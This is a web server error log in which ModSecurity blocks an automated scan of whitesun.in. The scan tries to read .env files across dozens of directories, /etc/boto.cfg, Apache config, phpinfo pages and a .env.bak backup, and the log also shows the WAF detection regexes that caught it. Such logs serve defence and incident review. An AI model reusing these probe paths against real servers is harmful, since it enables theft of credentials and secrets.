[Tue May 26 13:39:33.854483 2026] [security2:error] [pid 536875:tid 536908] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/development/.env"] [unique_id "ahVVPer_-FTveSGlx1HpPwAAkyA"]
[Tue May 26 13:39:33.855494 2026] [cgid:error] [pid 536875:tid 536994] [remote 45.148.10.95:51320] AH01264: stderr from /home2/whitece9/public_html/dnscfg.cgi: script not found or unable to stat
[Tue May 26 13:39:34.001162 2026] [security2:error] [pid 536875:tid 536928] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/erp/.env"] [unique_id "ahVVPur_-FTveSGlx1HpUQAA-zQ"]
[Tue May 26 13:39:34.011236 2026] [security2:error] [pid 536875:tid 536935] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVVPur_-FTveSGlx1HpUwAA1Ts"]
[Tue May 26 13:39:34.049477 2026] [security2:error] [pid 536875:tid 536932] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/etc/boto.cfg"] [unique_id "ahVVPur_-FTveSGlx1HpVAAAzzg"]
[Tue May 26 13:39:34.054045 2026] [security2:error] [pid 536875:tid 536992] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/fe/.env"] [unique_id "ahVVPur_-FTveSGlx1HpVQAAj3Q"]
[Tue May 26 13:39:34.134099 2026] [security2:error] [pid 536875:tid 536997] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/front/.env"] [unique_id "ahVVPur_-FTveSGlx1HpWgAA4nk"]
[Tue May 26 13:39:34.135817 2026] [security2:error] [pid 536875:tid 536986] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/frontend/.env"] [unique_id "ahVVPur_-FTveSGlx1HpWwAA4m4"]
[Tue May 26 13:39:34.156059 2026] [security2:error] [pid 536875:tid 536915] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/info.php"] [unique_id "ahVVPur_-FTveSGlx1HpZAAAsSc"]
[Tue May 26 13:39:34.194494 2026] [security2:error] [pid 536875:tid 536939] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/infophp.php"] [unique_id "ahVVPur_-FTveSGlx1HpZgAAxj8"]
[Tue May 26 13:39:34.198884 2026] [security2:error] [pid 536875:tid 536934] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/infos.php"] [unique_id "ahVVPur_-FTveSGlx1HpaAAA5jo"]
[Tue May 26 13:39:34.282887 2026] [security2:error] [pid 536875:tid 536946] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/laravel/.env"] [unique_id "ahVVPur_-FTveSGlx1HpawAA2EY"]
[Tue May 26 13:39:34.284081 2026] [security2:error] [pid 536875:tid 536964] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/local/.env"] [unique_id "ahVVPur_-FTveSGlx1HpbgAA2Fg"]
[Tue May 26 13:39:34.285289 2026] [security2:error] [pid 536875:tid 536949] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/lms/.env"] [unique_id "ahVVPur_-FTveSGlx1HpcAAA2Ek"]
[Tue May 26 13:39:34.292587 2026] [security2:error] [pid 536875:tid 536963] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/market/.env"] [unique_id "ahVVPur_-FTveSGlx1HpcwAAr1c"]
[Tue May 26 13:39:34.293125 2026] [security2:error] [pid 536875:tid 536952] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/marketing/.env"] [unique_id "ahVVPur_-FTveSGlx1HpdAAAr0w"]
[Tue May 26 13:39:34.295150 2026] [security2:error] [pid 536875:tid 536941] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/media/.env"] [unique_id "ahVVPur_-FTveSGlx1HpdgAAr0E"]
[Tue May 26 13:39:34.428514 2026] [security2:error] [pid 536875:tid 536988] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/new/.env"] [unique_id "ahVVPur_-FTveSGlx1HpgAAA4HA"]
[Tue May 26 13:39:34.429378 2026] [security2:error] [pid 536875:tid 536967] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node-api/.env"] [unique_id "ahVVPur_-FTveSGlx1HpgQAA4Fs"]
[Tue May 26 13:39:34.433101 2026] [security2:error] [pid 536875:tid 536944] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/api/.env"] [unique_id "ahVVPur_-FTveSGlx1HpggAAm0Q"]
[Tue May 26 13:39:34.433243 2026] [security2:error] [pid 536875:tid 536969] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeapi/.env"] [unique_id "ahVVPur_-FTveSGlx1HphQAAm10"]
[Tue May 26 13:39:34.433243 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/.env"] [unique_id "ahVVPur_-FTveSGlx1HpgwAAm1A"]
[Tue May 26 13:39:34.433247 2026] [security2:error] [pid 536875:tid 536983] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/node/backend/.env"] [unique_id "ahVVPur_-FTveSGlx1HphAAAm2s"]
[Tue May 26 13:39:34.435010 2026] [security2:error] [pid 536875:tid 536953] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/nodeweb/.env"] [unique_id "ahVVPur_-FTveSGlx1HphgAAm00"]
[Tue May 26 13:39:34.439150 2026] [security2:error] [pid 536875:tid 536973] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/old/.env"] [unique_id "ahVVPur_-FTveSGlx1HpigABAmE"]
[Tue May 26 13:39:34.440655 2026] [security2:error] [pid 536875:tid 536979] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/opt/.env"] [unique_id "ahVVPur_-FTveSGlx1HpjAABAmc"]
[Tue May 26 13:39:34.492762 2026] [security2:error] [pid 536875:tid 537021] [client 185.191.171.13:38690] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahVVPur_-FTveSGlx1HpkQAAAJU"]
[Tue May 26 13:39:34.492840 2026] [security2:error] [pid 536875:tid 537021] [client 185.191.171.13:38690] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahVVPur_-FTveSGlx1HpkQAAAJU"]
[Tue May 26 13:39:34.636605 2026] [security2:error] [pid 536875:tid 536877] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php-info.php"] [unique_id "ahVVPur_-FTveSGlx1HpoQAAzQE"]
[Tue May 26 13:39:34.721343 2026] [security2:error] [pid 536875:tid 536876] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php_info.php"] [unique_id "ahVVPur_-FTveSGlx1HppwAAmQA"]
[Tue May 26 13:39:34.721369 2026] [security2:error] [pid 536875:tid 536955] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/php.php"] [unique_id "ahVVPur_-FTveSGlx1HppgAAmU8"]
[Tue May 26 13:39:34.726748 2026] [security2:error] [pid 536875:tid 536883] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/phpinfo.php"] [unique_id "ahVVPur_-FTveSGlx1HpqQAA_Qc"]
[Tue May 26 13:39:34.727583 2026] [security2:error] [pid 536875:tid 536883] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/portal/.env"] [unique_id "ahVVPur_-FTveSGlx1HpqwAA_Qc"]
[Tue May 26 13:39:34.731959 2026] [security2:error] [pid 536875:tid 536980] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/prod/.env"] [unique_id "ahVVPur_-FTveSGlx1HprwAA_Wg"]
[Tue May 26 13:39:34.732309 2026] [security2:error] [pid 536875:tid 536889] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/production/.env"] [unique_id "ahVVPur_-FTveSGlx1HpsQAA_Q0"]
[Tue May 26 13:39:34.733210 2026] [security2:error] [pid 536875:tid 536891] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/product/.env"] [unique_id "ahVVPur_-FTveSGlx1HpsAAA_Q8"]
[Tue May 26 13:39:34.782132 2026] [security2:error] [pid 536875:tid 536890] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/project/.env"] [unique_id "ahVVPur_-FTveSGlx1HptwAA7g4"]
[Tue May 26 13:39:34.867043 2026] [security2:error] [pid 536875:tid 536898] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public/.env"] [unique_id "ahVVPur_-FTveSGlx1HpuwAA2hY"]
[Tue May 26 13:39:34.867478 2026] [security2:error] [pid 536875:tid 536895] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public-api/.env"] [unique_id "ahVVPur_-FTveSGlx1HpugAA2hM"]
[Tue May 26 13:39:34.871560 2026] [security2:error] [pid 536875:tid 536897] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "whitesun.in"] [uri "/public/phpinfo.php"] [unique_id "ahVVPur_-FTveSGlx1HpvAAA9xU"]
[Tue May 26 13:39:34.873738 2026] [security2:error] [pid 536875:tid 536901] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/public_html/.env"] [unique_id "ahVVPur_-FTveSGlx1HpvgAA9xk"]
[Tue May 26 13:39:34.875833 2026] [security2:error] [pid 536875:tid 536885] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/qa/.env"] [unique_id "ahVVPur_-FTveSGlx1HpwAAA9wk"]
[Tue May 26 13:39:35.168352 2026] [security2:error] [pid 536875:tid 536919] [remote 45.148.10.95:51320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "whitesun.in"] [uri "/s3/.env.bak"] [unique_id "ahVVP-r_-FTveSGlx1Hp4gAApSs"]
